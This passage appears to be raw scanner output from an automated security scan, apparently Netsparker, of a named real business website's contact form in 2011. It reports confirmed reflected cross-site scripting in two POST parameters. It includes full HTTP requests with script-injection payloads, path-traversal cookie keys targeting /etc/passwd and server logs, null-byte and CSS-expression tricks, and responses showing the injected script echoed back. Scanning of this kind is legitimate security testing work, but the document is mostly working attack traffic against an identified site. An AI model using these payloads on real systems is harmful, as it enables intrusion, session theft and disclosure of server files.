</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="3" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="Smith" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="Smith" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="netsparker@example.com" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="3" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="3" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="3" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="3"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="'"--></style></script><script>netsparker(0x000CE8)</script>" name="url" id="url" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> </tr> </table> </td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <td wid..
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter Type Value
button POST Submit
captchaString POST 3
comments POST 3
company POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
leadCategory POST 3
phone POST 3
subCategoryId POST -1
url POST 3
value POST '"--></style></script><script>alert(0x000D13)</script>
yourInterest POST 3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 265
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&leadCategory=3&phone=3&subCategoryId=-1&url=3&value='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000D13)%3c%2fscript%3e&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:36:10 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=8B8F3D1D74907B7AA8EA0BBFDE4172EE; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="'"--></style></script><script>netsparker(0x000D13)</script>" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="Smith" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="Smith" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="netsparker@example.com" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="3" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="3" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="3" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="3"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="3" name="url" id="url" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> </tr> </table> </td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <td wid..
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter Type Value
button POST Submit
captchaString POST 3
comments POST 3
company POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
leadCategory POST 3
phone POST 3
subCategoryId POST -1
url POST 3
value POST 3
yourInterest POST '"--></style></script><script>alert(0x000D3E)</script>

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 265
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&leadCategory=3&phone=3&subCategoryId=-1&url=3&value=3&yourInterest='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000D3E)%3c%2fscript%3e

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:36:14 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=5A81E68A25E61ABC9599C96357CB4FC7; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
